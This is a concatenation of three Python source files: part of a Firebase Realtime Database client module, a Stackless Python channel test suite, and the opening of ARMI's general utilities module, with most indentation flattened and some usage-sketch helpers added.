Query: The updated Query instance.
Raises:
ValueError: If the value is not an integer, or limit_to_last() was called previously.
"""
if not isinstance(limit, int) or limit < 0:
raise ValueError('Limit must be a non-negative integer.')
if 'limitToLast' in self._params:
raise ValueError('Cannot set both first and last limits.')
self._params['limitToFirst'] = limit
return self
def limit_to_last(self, limit):
"""Creates a query with limit, and anchors it to the end of the window.
Args:
limit: The maximum number of child nodes to return.
Returns:
Query: The updated Query instance.
Raises:
ValueError: If the value is not an integer, or limit_to_first() was called previously.
"""
if not isinstance(limit, int) or limit < 0:
raise ValueError('Limit must be a non-negative integer.')
if 'limitToFirst' in self._params:
raise ValueError('Cannot set both first and last limits.')
self._params['limitToLast'] = limit
return self
def start_at(self, start):
"""Sets the lower bound for a range query.
The Query will only return child nodes with a value greater than or equal to the specified
value.
Args:
start: JSON-serializable value to start at, inclusive.
Returns:
Query: The updated Query instance.
Raises:
ValueError: If the value is ``None``.
"""
if start is None:
raise ValueError('Start value must not be None.')
self._params['startAt'] = json.dumps(start)
return self
def end_at(self, end):
"""Sets the upper bound for a range query.
The Query will only return child nodes with a value less than or equal to the specified
value.
Args:
end: JSON-serializable value to end at, inclusive.
Returns:
Query: The updated Query instance.
Raises:
ValueError: If the value is ``None``.
"""
if end is None:
raise ValueError('End value must not be None.')
self._params['endAt'] = json.dumps(end)
return self
def equal_to(self, value):
"""Sets an equals constraint on the Query.
The Query will only return child nodes whose value is equal to the specified value.
Args:
value: JSON-serializable value to query for.
Returns:
Query: The updated Query instance.
Raises:
ValueError: If the value is ``None``.
"""
if value is None:
raise ValueError('Equal to value must not be None.')
self._params['equalTo'] = json.dumps(value)
return self
@property
def _querystr(self):
params = []
for key in sorted(self._params):
params.append('{0}={1}'.format(key, self._params[key]))
return '&'.join(params)
def get(self):
"""Executes this Query and returns the results.
The results will be returned as a sorted list or an OrderedDict.
Returns:
object: Decoded JSON result of the Query.
Raises:
FirebaseError: If an error occurs while communicating with the remote database server.
"""
result = self._client.body('get', self._pathurl, params=self._querystr)
if isinstance(result, (dict, list)) and self._order_by != '$priority':
return _Sorter(result, self._order_by).get()
return result
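# --- Illustrative sketch (not part of the original module) ---
# A minimal example of building and executing a Query against a hypothetical
# 'scores' node, using the ordering and filtering constraints defined above.
def _example_query_usage():
    scores = reference('scores')
    # Children ordered by their 'points' child value, limited to the ten highest.
    top_ten = scores.order_by_child('points').limit_to_last(10).get()
    # Range query on keys: entries whose key falls between 'a' and 'm' inclusive.
    a_to_m = scores.order_by_key().start_at('a').end_at('m').get()
    return top_ten, a_to_m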
class TransactionAbortedError(exceptions.AbortedError):
"""A transaction was aborted aftr exceeding the maximum number of retries."""
def __init__(self, message):
exceptions.AbortedError.__init__(self, message)
class _Sorter:
"""Helper class for sorting query results."""
def __init__(self, results, order_by):
if isinstance(results, dict):
self.dict_input = True
entries = [_SortEntry(k, v, order_by) for k, v in results.items()]
elif isinstance(results, list):
self.dict_input = False
entries = [_SortEntry(k, v, order_by) for k, v in enumerate(results)]
else:
raise ValueError('Sorting not supported for "{0}" object.'.format(type(results)))
self.sort_entries = sorted(entries)
def get(self):
if self.dict_input:
return collections.OrderedDict([(e.key, e.value) for e in self.sort_entries])
return [e.value for e in self.sort_entries]
class _SortEntry:
"""A wrapper that is capable of sorting items in a dictionary."""
_type_none = 0
_type_bool_false = 1
_type_bool_true = 2
_type_numeric = 3
_type_string = 4
_type_object = 5
def __init__(self, key, value, order_by):
self._key = key
self._value = value
if order_by in ('$key', '$priority'):
self._index = key
elif order_by == '$value':
self._index = value
else:
self._index = _SortEntry._extract_child(value, order_by)
self._index_type = _SortEntry._get_index_type(self._index)
@property
def key(self):
return self._key
@property
def index(self):
return self._index
@property
def index_type(self):
return self._index_type
@property
def value(self):
return self._value
@classmethod
def _get_index_type(cls, index):
"""Assigns an integer code to the type of the index.
The index type determines how differently typed values are sorted. This ordering is based
on https://firebase.google.com/docs/database/rest/retrieve-data#section-rest-ordered-data
"""
if index is None:
return cls._type_none
if isinstance(index, bool) and not index:
return cls._type_bool_false
if isinstance(index, bool) and index:
return cls._type_bool_true
if isinstance(index, (int, float)):
return cls._type_numeric
if isinstance(index, str):
return cls._type_string
return cls._type_object
@classmethod
def _extract_child(cls, value, path):
segments = path.split('/')
current = value
for segment in segments:
if isinstance(current, dict):
current = current.get(segment)
else:
return None
return current
def _compare(self, other):
"""Compares two _SortEntry instances.
If the indices have the same numeric or string type, compare them directly. Ties are
broken by comparing the keys. If the indices have the same type, but are neither numeric
nor string, compare the keys. In all other cases compare based on the ordering provided
by index types.
"""
self_key, other_key = self.index_type, other.index_type
if self_key == other_key:
if self_key in (self._type_numeric, self._type_string) and self.index != other.index:
self_key, other_key = self.index, other.index
else:
self_key, other_key = self.key, other.key
if self_key < other_key:
return -1
if self_key > other_key:
return 1
return 0
def __lt__(self, other):
return self._compare(other) < 0
def __le__(self, other):
return self._compare(other) <= 0
def __gt__(self, other):
return self._compare(other) > 0
def __ge__(self, other):
return self._compare(other) >= 0
def __eq__(self, other):
return self._compare(other) == 0
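# Illustrative sketch: the type ordering documented in _SortEntry._get_index_type
# (None < False < True < numeric < string < object) as applied by _Sorter. The
# sample data and the 'score' child key are invented for illustration.
def _example_sorter_ordering():
    results = {
        'a': {'score': 'high'},
        'b': {'score': 3},
        'c': {'score': True},
        'd': {'score': None},
    }
    ordered = _Sorter(results, 'score').get()
    return list(ordered.keys())  # ['d', 'c', 'b', 'a']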
class _DatabaseService:
"""Service that maintains a collection of database clients."""
_DEFAULT_AUTH_OVERRIDE = '_admin_'
def __init__(self, app):
self._credential = app.credential
db_url = app.options.get('databaseURL')
if db_url:
self._db_url = db_url
else:
self._db_url = None
auth_override = _DatabaseService._get_auth_override(app)
if auth_override not in (self._DEFAULT_AUTH_OVERRIDE, {}):
self._auth_override = json.dumps(auth_override, separators=(',', ':'))
else:
self._auth_override = None
self._timeout = app.options.get('httpTimeout', _http_client.DEFAULT_TIMEOUT_SECONDS)
self._clients = {}
emulator_host = os.environ.get(_EMULATOR_HOST_ENV_VAR)
if emulator_host:
if '//' in emulator_host:
raise ValueError(
'Invalid {0}: "{1}". It must follow format "host:port".'.format(
_EMULATOR_HOST_ENV_VAR, emulator_host))
self._emulator_host = emulator_host
else:
self._emulator_host = None
def get_client(self, db_url=None):
"""Creates a client based on the db_url. Clients may be cached."""
if db_url is None:
db_url = self._db_url
if not db_url or not isinstance(db_url, str):
raise ValueError(
'Invalid database URL: "{0}". Database URL must be a non-empty '
'URL string.'.format(db_url))
parsed_url = parse.urlparse(db_url)
if not parsed_url.netloc:
raise ValueError(
'Invalid database URL: "{0}". Database URL must be a well-formed '
'URL string.'.format(db_url))
emulator_config = self._get_emulator_config(parsed_url)
if emulator_config:
credential = _utils.EmulatorAdminCredentials()
base_url = emulator_config.base_url
params = {'ns': emulator_config.namespace}
else:
# Defer credential lookup until we are certain it's going to be a prod connection.
credential = self._credential.get_credential()
base_url = 'https://{0}'.format(parsed_url.netloc)
params = {}
if self._auth_override:
params['auth_variable_override'] = self._auth_override
client_cache_key = (base_url, json.dumps(params, sort_keys=True))
if client_cache_key not in self._clients:
client = _Client(credential, base_url, self._timeout, params)
self._clients[client_cache_key] = client
return self._clients[client_cache_key]
def _get_emulator_config(self, parsed_url):
"""Checks whether the SDK should connect to the RTDB emulator."""
EmulatorConfig = collections.namedtuple('EmulatorConfig', ['base_url', 'namespace'])
if parsed_url.scheme != 'https':
# Emulator mode enabled by passing http URL via AppOptions
base_url, namespace = _DatabaseService._parse_emulator_url(parsed_url)
return EmulatorConfig(base_url, namespace)
if self._emulator_host:
# Emulator mode enabled via environment variable
base_url = 'http://{0}'.format(self._emulator_host)
namespace = parsed_url.netloc.split('.')[0]
return EmulatorConfig(base_url, namespace)
return None
@classmethod
def _parse_emulator_url(cls, parsed_url):
"""Parses emulator URL like http://localhost:8080/?ns=foo-bar"""
query_ns = parse.parse_qs(parsed_url.query).get('ns')
if parsed_url.scheme != 'http' or (not query_ns or len(query_ns) != 1 or not query_ns[0]):
raise ValueError(
'Invalid database URL: "{0}". Database URL must be a valid URL to a '
'Firebase Realtime Database instance.'.format(parsed_url.geturl()))
namespace = query_ns[0]
base_url = '{0}://{1}'.format(parsed_url.scheme, parsed_url.netloc)
return base_url, namespace
@classmethod
def _get_auth_override(cls, app):
auth_override = app.options.get('databaseAuthVariableOverride', cls._DEFAULT_AUTH_OVERRIDE)
if auth_override == cls._DEFAULT_AUTH_OVERRIDE or auth_override is None:
return auth_override
if not isinstance(auth_override, dict):
raise ValueError('Invalid databaseAuthVariableOverride option: "{0}". Override '
'value must be a dict or None.'.format(auth_override))
return auth_override
def close(self):
for value in self._clients.values():
value.close()
self._clients = {}
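# Illustrative sketch: how an emulator-style URL is split into a base URL and a
# namespace by the helper below. The host, port, and 'demo-project' namespace
# are invented for illustration.
def _example_parse_emulator_url():
    parsed = parse.urlparse('http://localhost:9000/?ns=demo-project')
    return _DatabaseService._parse_emulator_url(parsed)
    # -> ('http://localhost:9000', 'demo-project')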
class _Client(_http_client.JsonHttpClient):
"""HTTP client used to make REST calls.
_Client maintains an HTTP session, and handles authenticating HTTP requests along with
marshalling and unmarshalling of JSON data.
"""
def __init__(self, credential, base_url, timeout, params=None):
"""Creates a new _Client from the given parameters.
This exists primarily to enable testing. For regular use, obtain _Client instances by
calling the from_app() class method.
Args:
credential: A Google credential that can be used to authenticate requests.
base_url: A URL prefix to be added to all outgoing requests. This is typically the
Firebase Realtime Database URL.
timeout: HTTP request timeout in seconds. If set to None connections will never
timeout, which is the default behavior of the underlying requests library.
params: Dict of query parameters to add to all outgoing requests.
"""
super().__init__(
credential=credential, base_url=base_url,
timeout=timeout, headers={'User-Agent': _USER_AGENT})
self.credential = credential
self.params = params if params else {}
def request(self, method, url, **kwargs):
"""Makes an HTTP call using the Python requests library.
Extends the request() method of the parent JsonHttpClient class. Handles default
params like auth overrides, and low-level exceptions.
Args:
method: HTTP method name as a string (e.g. get, post).
url: URL path of the remote endpoint. This will be appended to the server's base URL.
kwargs: An additional set of keyword arguments to be passed into requests API
(e.g. json, params).
Returns:
Response: An HTTP response object.
Raises:
FirebaseError: If an error occurs while making the HTTP call.
"""
query = '&'.join('{0}={1}'.format(key, self.params[key]) for key in self.params)
extra_params = kwargs.get('params')
if extra_params:
if query:
query = extra_params + '&' + query
else:
query = extra_params
kwargs['params'] = query
try:
return super(_Client, self).request(method, url, **kwargs)
except requests.exceptions.RequestException as error:
raise _Client.handle_rtdb_error(error)
def create_listener_session(self):
return _sseclient.KeepAuthSession(self.credential)
@classmethod
def handle_rtdb_error(cls, error):
"""Converts an error encountered while calling RTDB into a FirebaseError."""
if error.response is None:
return _utils.handle_requests_error(error)
message = cls._extract_error_message(error.response)
return _utils.handle_requests_error(error, message=message)
@classmethod
def _extract_error_message(cls, response):
"""Extracts an error message from an error response.
If the server has sent a JSON response with an 'error' field, which is the typical
behavior of the Realtime Database REST API, parses the response to retrieve the error
message. If the server has sent a non-JSON response, returns the full response
as the error message.
"""
message = None
try:
# RTDB error format: {"error": "text message"}
data = response.json()
if isinstance(data, dict):
message = data.get('error')
except ValueError:
pass
if not message:
message = 'Unexpected response from database: {0}'.format(response.content.decode())
return message
|
test_channel.py
|
from __future__ import absolute_import
import unittest
import stackless
try:
import threading
withThreads = True
except ImportError:
withThreads = False
import sys
import traceback
import contextlib
from support import test_main # @UnusedImport
from support import StacklessTestCase, require_one_thread
@contextlib.contextmanager
def block_trap(trap=True):
"""
A context manager to temporarily set the block trap state of the
current tasklet. Defaults to setting it to True
"""
c = stackless.getcurrent()
old = c.block_trap
c.block_trap = trap
try:
yield
finally:
c.block_trap = old
class TestChannels(StacklessTestCase):
def testBlockingSend(self):
''' Test that when a tasklet sends to a channel without waiting receivers, the tasklet is blocked. '''
# Function to block when run in a tasklet.
def f(testChannel):
testChannel.send(1)
# Get the tasklet blocked on the channel.
channel = stackless.channel()
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
# The tasklet should be blocked.
self.assertTrue(tasklet.blocked, "The tasklet should have been run and have blocked on the channel waiting for a corresponding receiver")
# The channel should have a balance indicating one blocked sender.
self.assertTrue(channel.balance == 1, "The channel balance should indicate one blocked sender waiting for a corresponding receiver")
def testBlockingReceive(self):
''' Test that when a tasklet receives from a channel without waiting senders, the tasklet is blocked. '''
# Function to block when run in a tasklet.
def f(testChannel):
testChannel.receive()
# Get the tasklet blocked on the channel.
channel = stackless.channel()
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
# The tasklet should be blocked.
self.assertTrue(tasklet.blocked, "The tasklet should have been run and have blocked on the channel waiting for a corresponding sender")
# The channel should have a balance indicating one blocked receiver.
self.assertEqual(channel.balance, -1, "The channel balance should indicate one blocked receiver waiting for a corresponding sender")
def testNonBlockingSend(self):
''' Test that when there is a waiting receiver, we can send without blocking with normal channel behaviour. '''
originalValue = 1
receivedValues = []
# Function to block when run in a tasklet.
def f(testChannel):
receivedValues.append(testChannel.receive())
# Get the tasklet blocked on the channel.
channel = stackless.channel()
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
# Make sure that the current tasklet cannot block when it tries to receive. We do not want
# to exit this test having clobbered the block trapping value, so we make sure we restore
# it.
oldBlockTrap = stackless.getcurrent().block_trap
try:
stackless.getcurrent().block_trap = True
channel.send(originalValue)
finally:
stackless.getcurrent().block_trap = oldBlockTrap
self.assertTrue(len(receivedValues) == 1 and receivedValues[0] == originalValue, "We sent a value, but it was not the one we received. Completely unexpected.")
def testNonBlockingReceive(self):
''' Test that when there is a waiting sender, we can receive without blocking with normal channel behaviour. '''
originalValue = 1
# Function to block when run in a tasklet.
def f(testChannel, valueToSend):
testChannel.send(valueToSend)
# Get the tasklet blocked on the channel.
channel = stackless.channel()
tasklet = stackless.tasklet(f)(channel, originalValue)
tasklet.run()
# Make sure that the current tasklet cannot block when it tries to receive. We do not want
# to exit this test having clobbered the block trapping value, so we make sure we restore
# it.
oldBlockTrap = stackless.getcurrent().block_trap
try:
stackless.getcurrent().block_trap = True
value = channel.receive()
finally:
stackless.getcurrent().block_trap = oldBlockTrap
tasklet.kill()
self.assertEqual(value, originalValue, "We received a value, but it was not the one we sent. Completely unexpected.")
@require_one_thread
def testMainTaskletBlockingWithoutASender(self):
''' Test that the last runnable tasklet cannot be blocked on a channel. '''
c = stackless.channel()
self.assertRaises(RuntimeError, c.receive)
@unittest.skipUnless(withThreads, "Compiled without threading")
def testInterthreadCommunication(self):
''' Test that tasklets in different threads sending over channels to each other work. '''
commandChannel = stackless.channel()
def master_func():
commandChannel.send("ECHO 1")
commandChannel.send("ECHO 2")
commandChannel.send("ECHO 3")
commandChannel.send("QUIT")
def slave_func():
while 1:
command = commandChannel.receive()
if command == "QUIT":
break
def scheduler_run(tasklet_func):
t = stackless.tasklet(tasklet_func)()
while t.alive:
stackless.run()
thread = threading.Thread(target=scheduler_run, args=(master_func,))
thread.start()
scheduler_run(slave_func)
def testSendException(self):
# Function to send the exception
def f(testChannel):
testChannel.send_exception(ValueError, 1, 2, 3)
# Get the tasklet blocked on the channel.
channel = stackless.channel()
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
self.assertRaises(ValueError, channel.receive)
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
try:
channel.receive()
except ValueError as e:
self.assertEqual(e.args, (1, 2, 3))
def testSendThrow(self):
# subfunction in tasklet
def bar():
raise ValueError(1, 2, 3)
# Function to send the exception
def f(testChannel):
try:
bar()
except Exception:
testChannel.send_throw(*sys.exc_info())
# Get the tasklet blocked on the channel.
channel = stackless.channel()
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
self.assertRaises(ValueError, channel.receive)
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
try:
channel.receive()
except ValueError:
exc, val, tb = sys.exc_info()
self.assertEqual(val.args, (1, 2, 3))
# Check that the traceback is correct
l = traceback.extract_tb(tb)
self.assertEqual(l[-1][2], "bar")
def testBlockTrapSend(self):
'''Test that block trapping works when sending'''
channel = stackless.channel()
count = [0]
def f():
with block_trap():
self.assertRaises(RuntimeError, channel.send, None)
count[0] += 1
# Test on main tasklet and on worker
f()
stackless.tasklet(f)()
stackless.run()
self.assertEqual(count[0], 2)
def testBlockTrapRecv(self):
'''Test that block trapping works when receiving'''
channel = stackless.channel()
count = [0]
def f():
with block_trap():
self.assertRaises(RuntimeError, channel.receive)
count[0] += 1
f()
stackless.tasklet(f)()
stackless.run()
self.assertEqual(count[0], 2)
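# Usage sketch (illustrative only): a minimal producer/consumer round trip on a
# channel, mirroring the blocking send/receive behaviour exercised by the tests
# above; the value 42 is arbitrary.
def _example_channel_round_trip():
    channel = stackless.channel()
    received = []
    def producer():
        channel.send(42)          # blocks until the consumer is ready
    def consumer():
        received.append(channel.receive())
    stackless.tasklet(producer)()
    stackless.tasklet(consumer)()
    stackless.run()
    return received               # [42]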
class TestClose(StacklessTestCase):
"""Test using close semantics with channels"""
def setUp(self):
super(TestClose, self).setUp()
self.c = stackless.channel()
# TODO: This test shows how ill-conceived the current closing/closed semantics are.
# See https://bitbucket.org/stackless-dev/stackless/issues/53
def testSequence(self):
def sender():
self.c.send_sequence(range(10))
self.c.close()
# this needs to change, close does not wake up a receiver, we must pump it
while self.c.closing and not self.c.closed:
self.c.send(None)
data = []
def receiver():
for i in self.c:
data.append(i)
# remove the extra "pump" nones at the end....
while data[-1] is None:
data.pop(-1)
data.append(10)
stackless.tasklet(sender)()
stackless.tasklet(receiver)()
stackless.run()
self.assertEqual(data, list(range(11)))
self.assertTrue(self.c.closed)
def testSequence2(self):
def sender():
length = self.c.send_sequence(range(10))
self.assertEqual(length, 10)
# A future version of Stackless may send StopIteration
# automatically, if you close the channel
# See https://bitbucket.org/stackless-dev/stackless/issues/53
self.c.send_exception(StopIteration)
self.c.close()
data = []
def receiver():
for i in self.c:
data.append(i)
stackless.tasklet(sender)()
stackless.tasklet(receiver)()
stackless.run()
self.assertEqual(data, list(range(10)))
self.assertTrue(self.c.closed)
def testSender(self):
self.c.close()
self.assertRaises(ValueError, self.c.send, None)
def testReceiver(self):
self.c.close()
self.assertRaises(ValueError, self.c.receive)
def testIterator(self):
self.c.close()
i = iter(self.c)
def n():
return next(i)
self.assertRaises(StopIteration, n)
class Subclassing(StacklessTestCase):
def test_init(self):
"""Test that we can subclass channel without overriding __new__"""
class myclass(stackless.channel):
def __init__(self, name):
super(myclass, self).__init__()
self.name = name
name = "bong"
c = myclass(name)
self.assertEqual(c.name, name)
if __name__ == '__main__':
if not sys.argv[1:]:
sys.argv.append('-v')
unittest.main()
|
__init__.py
|
# Copyright 2019 TerraPower, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generic ARMI utilities"""
import os
import sys
import time
import pickle
import re
import pkgutil
import importlib
import traceback
import getpass
import math
import datetime
import tempfile
import shutil
import threading
import subprocess
import collections
import hashlib
import numpy
import scipy.optimize as sciopt
import armi
from armi import runLog
from armi.utils import iterables
from armi.utils.flags import Flag
# Read in file 1 MB at a time to reduce memory burden of reading entire file at once
_HASH_BUFFER_SIZE = 1024 * 1024
# special pattern to deal with FORTRAN-produced scipats without E, like 3.2234-234
SCIPAT_SPECIAL = re.compile(r"([+-]?\d*\.\d+)[eEdD]?([+-]\d+)")
def coverageReportHelper(config, dataPaths):
"""
Small utility function to generate coverage reports.
This was created to side-step the difficulties in submitting multi-line python
commands on-the-fly.
This combines data paths and then makes html and xml reports for the
fully-combined result.
"""
from coverage import Coverage
import coverage
try:
cov = Coverage(config_file=config)
if dataPaths:
# fun fact: if you combine when there's only one file, it gets deleted.
cov.combine(data_paths=dataPaths)
cov.save()
else:
cov.load()
cov.html_report()
cov.xml_report()
except PermissionError as e:
# Some file systems have some issues with filenames that start with a '.', such as the
# .coverage files. If a permissions error is raised, it likely has something to
# do with that. We changed the COVERAGE_RESULTS_FILE in cases.py for this reason.
runLog.error(
f"There was an issue in generating coverage reports due "
f"to the following permissions error: {e}"
)
# disabled until we figure out the problem.
# raise
except coverage.misc.CoverageException as e:
# This is happening when forming the unit test coverage report. This may be
# caused by the TestFixture coverage report gobbling up all of the coverage
# files before the UnitTests.cov_report task gets a chance to see them. It may
# simply be that we don't want a coverage report generated for the TestFixture.
# Something to think about. Either way, we do not want to fail the job just
# because of this
runLog.error(
"There was an issue generating coverage reports "
"({}):\n{}".format(type(e), e.args)
)
def getFileSHA1Hash(filePath, digits=40):
"""
Generate a SHA-1 hash of the input file.
Parameters
----------
filePath : str
Path to file to obtain the SHA-1 hash
digits : int, optional
Number of digits to include in the hash (40 digit maximum for SHA-1)
"""
sha1 = hashlib.sha1()
with open(filePath, "rb") as f:
while True:
data = f.read(_HASH_BUFFER_SIZE)
if not data:
break
sha1.update(data)
return sha1.hexdigest()[:digits]
def efmt(a: str) -> str:
r"""Converts string exponential number to another string with just 2 digits in the exponent."""
# this assumes that none of our numbers will be more than 1e100 or less than 1e-100...
if len(a.split("E")) != 2:
two = a.split("e")
else:
two = a.split("E")
# print two
exp = two[1] # this is '+002' or '+02' or something
if len(exp) == 4: # it has 3 digits of exponent
exp = exp[0] + exp[2:] # gets rid of the hundred's place digit
return two[0] + "E" + exp
def fixThreeDigitExp(strToFloat: str) -> float:
"""
Convert FORTRAN numbers that cannot be converted into floats.
Notes
-----
Converts a number like "9.03231714805651-101" (no e or E) to "9.03231714805651e-101".
Some external depletion kernels currently need this fix. From contact with developer:
The notation like 1.0-101 is a FORTRAN thing, with history going back to the 60's.
They will only put E before an exponent 99 and below. Fortran will also read these guys
just fine, and they are valid floating point numbers. It would not be a useful effort,
in terms of time, trying to get FORTRAN to behave differently.
The approach has been to write a routine in the reading code which will interpret these.
This helps when the scientific number exponent does not fit.
"""
match = SCIPAT_SPECIAL.match(strToFloat)
return float("{}E{}".format(*match.groups()))
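# Usage sketch (illustrative only): repairing a FORTRAN-style exponent that
# lacks the E, as described in the notes above; the sample string is arbitrary.
def _exampleFixThreeDigitExp():
    return fixThreeDigitExp("9.03231714805651-101")  # -> 9.03231714805651e-101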
def findClosest(listToSearch, val, indx=False):
r"""
find closest item in a list.
Parameters
----------
listToSearch : list
The list to search through
val : float
The target value that is being searched for in the list
indx : bool, optional
If true, returns minVal and minIndex, otherwise, just the value
Returns
-------
minVal : float
The item in the listToSearch that is closest to val
minI : int
The index of the item in listToSearch that is closest to val. Returned if indx=True.
"""
d = float("inf")
minVal = None
minI = None
for i, item in enumerate(listToSearch):
if abs(item - val) < d:
d = abs(item - val)
minVal = item
minI = i
if indx:
return minVal, minI
else:
# backwards compatibility
return minVal
def copyWithoutBlocking(src, dest):
"""
Copy a file in a separate thread to avoid blocking while IO completes.
Useful for copying large files while ARMI moves along.
"""
files = "{} to {}".format(src, dest)
runLog.extra("Copying (without blocking) {}".format(files))
t = threading.Thread(target=shutil.copy, args=(src, dest))
t.start()
return t
def linearInterpolation(x0, y0, x1, y1, targetX=None, targetY=None):
r"""
does a linear interpolation (or extrapolation) for y=f(x)
Parameters
----------
x0,y0,x1,y1 : float
Coordinates of two points to interpolate between
targetX : float, optional
X value to evaluate the line at
targetY : float, optional
Y value we want to find the x value for (inverse interpolation)
Returns
-------
interpY : float
The value of y(targetX), if targetX is not None
interpX : float
The value of x where y(x) = targetY (if targetY is not None)
y = m(x-x0) + b
x = (y-b)/m
"""
if x1 == x0:
raise ZeroDivisionError("The x-values are identical. Cannot interpolate.")
m = (y1 - y0) / (x1 - x0)
b = -m * x0 + y0
if targetX is not None:
return m * targetX + b
else:
return (targetY - b) / m
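# Usage sketch (illustrative only): forward and inverse interpolation on the
# line through (0, 0) and (2, 4); the points are arbitrary.
def _exampleLinearInterpolation():
    yAtOne = linearInterpolation(0.0, 0.0, 2.0, 4.0, targetX=1.0)   # 2.0
    xAtThree = linearInterpolation(0.0, 0.0, 2.0, 4.0, targetY=3.0)  # 1.5
    return yAtOne, xAtThree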
def parabolaFromPoints(p1, p2, p3):
r"""
find the parabola that passes through three points
We solve a simultaneous equation with three points.
A = x1**2 x1 1
x2**2 x2 1
x3**2 x3 1
b = y1
y2
y3
find coefficients Ax=b
Parameters
----------
p1 : tuple
first point (x,y) coordinates
p2,p3: tuple, second and third points.
Returns
-------
a,b,c coefficients of y=ax^2+bx+c
"""
A = numpy.array(
[[p1[0] ** 2, p1[0], 1], [p2[0] ** 2, p2[0], 1], [p3[0] ** 2, p3[0], 1]]
)
b = numpy.array([[p1[1]], [p2[1]], [p3[1]]])
try:
x = numpy.linalg.solve(A, b)
except:
print("Error in parabola {} {}".format(A, b))
raise
return float(x[0]), float(x[1]), float(x[2])
def parabolicInterpolation(ap, bp, cp, targetY):
r"""
Given parabola coefficients, this interpolates the time
that would give k = targetY.
keff = a*t^2 + b*t + c
We want to solve a*t^2 + b*t + c - targetY = 0.0 for time.
if there are real roots, we should probably take the smallest one
because the larger one might be at very high burnup.
If there are no real roots, just take the point where the deriv ==0, or
2at+b=0, so t = -b/2a
The slope of the curve is the solution to 2at+b at whatever t has been determined
Parameters
----------
ap, bp,cp : floats
coefficients of a parabola y = ap*x^2 + bp*x + cp
targetY : float
The keff to find the cycle length of
Returns
-------
realRoots : list of tuples
(root, slope)
The best guess of the cycle length that will give k = targetY
If no positive root was found, this is the maximum of the curve. In that case,
it will be a negative number. If there are two positive roots, there will be two entries.
slope : float
The slope of the keff vs. time curve at t=newTime
"""
roots = numpy.roots([ap, bp, cp - targetY])
realRoots = []
for r in roots:
if r.imag == 0 and r.real > 0:
realRoots.append((r.real, 2.0 * ap * r.real + bp))
if not realRoots:
# no positive real roots. Take the maximum and give up for this cycle.
newTime = -bp / (2 * ap)
if newTime < 0:
raise RuntimeError("No positive roots or maxima.")
slope = 2.0 * ap * newTime + bp
newTime = (
-newTime
) # return a negative newTime to signal that it is not expected to be critical.
realRoots = [(newTime, slope)]
return realRoots
def getFloat(val):
r"""returns float version of val, or None if it's impossible. Useful for converting
user-input into floats when '' might be possible."""
try:
newVal = float(val)
return newVal
except:
return None
def relErr(v1: float, v2: float) -> float:
if v1:
return (v2 - v1) / v1
else:
return -1e99
def getTimeStepNum(cycleNumber, subcycleNumber, cs):
"""Return the timestep associated with cycle and tn.
Parameters
----------
cycleNumber : int, The cycle number
subcycleNumber : int, The intra-cycle time node (0 for BOC, etc.)
cs : Settings object
"""
return cycleNumber * getNodesPerCycle(cs) + subcycleNumber
def getCycleNode(timeStepNum, cs):
"""
Return the (cycle, node) corresponding to a cumulative time step number.
Parameters
----------
timeStepNum
The cumulative number of time steps since the beginning
cs
A case Settings object to get the nodes-per-cycle from
"""
nodesPerCycle = getNodesPerCycle(cs)
return (timeStepNum // nodesPerCycle, timeStepNum % nodesPerCycle)
def getNodesPerCycle(cs):
"""Return the number of nodes per cycles for this case settings."""
return cs["burnSteps"] + 1
def getPreviousTimeStep(cycle, node, burnSteps):
"""Return the time step before the specified time step"""
if (cycle, node) == (0, 0):
raise ValueError("There is not Time step before (0, 0)")
if node != 0:
return (cycle, node - 1)
else:
# index starts at zero, so the last node in a cycle is equal to the number of
# burn steps.
return (cycle - 1, burnSteps)
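# Usage sketch (illustrative only): the cycle/node bookkeeping helpers above.
# A plain dict stands in for a case Settings object here; only the "burnSteps"
# key is consulted.
def _exampleTimeStepHelpers():
    cs = {"burnSteps": 3}                    # 4 nodes per cycle
    stepNum = getTimeStepNum(2, 1, cs)       # -> 9
    cycleNode = getCycleNode(9, cs)          # -> (2, 1)
    previous = getPreviousTimeStep(2, 0, 3)  # -> (1, 3)
    return stepNum, cycleNode, previous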
def tryPickleOnAllContents(obj, ignore=None, path=None, verbose=False):
r"""
Attempts to pickle all members of this object and identifies those that cannot be pickled.
Useful for debugging MPI-bcast errors.
Not recursive yet. It would be nice to have it loop through nested objects (blocks in assems in reactors)
Parameters
----------
obj : object
Any object to be tested.
ignore : iterable
list of string variable names to ignore.
path : str
the path in which to test pickle.
verbose : bool, optional
Print all objects whether they fail or not
"""
if ignore is None:
ignore = []
# pickle gives better error messages than cPickle
for name, ob in obj.__dict__.items():
if name not in ignore:
if verbose:
print("Checking {0}...".format(name))
try:
pickle.dumps(ob) # dump as a string
except:
print(
"{0} in {1} cannot be pickled. It is: {2}. ".format(name, obj, ob)
)
# traceback.print_exc(limit=0,file=sys.stdout)
def tryPickleOnAllContents2(*args, **kwargs):
# helper
print(doTestPickleOnAllContents2(*args, **kwargs))
def doTestPickleOnAllContents2(obj, ignore=None, path=None, verbose=False):
r"""
Attempts to find one unpickleable object in a nested object
Returns
-------
pickleChain : list
list of names in a chain that are unpickleable. Just one example per object
e.g. ['r','assemblies','A101','lib'] means the lib is unpickleable.
"""
if ignore is None:
ignore = []
unpickleable = []
if not hasattr(obj, "__dict__"):
print("done")
return unpickleable
for name, ob in obj.__dict__.items():
print(("checking ", name))
if name not in ignore:
try:
pickle.dumps(ob) # dump as a string
except:
unpickleable.append(name)
print("Cant pickle {0}".format(name))
# recursive call.
unpickleable.extend(
doTestPickleOnAllContents2(ob, ignore=unpickleable + ignore)
)
return unpickleable
class MyPickler(pickle.Pickler):
r"""
The big guns. This will find your pickle errors if all else fails.
Use with tryPickleOnAllContents3.
"""
def save(self, obj):
try:
pickle.Pickler.save(self, obj)
except Exception:
_excType, excValue, _excTraceback = sys.exc_info()
print("Object that failed: {}. Err: {}".format(obj, excValue))
raise
def tryPickleOnAllContents3(obj, ignore=None, path=None, verbose=False):
"""
Definitely find pickle errors
Notes
-----
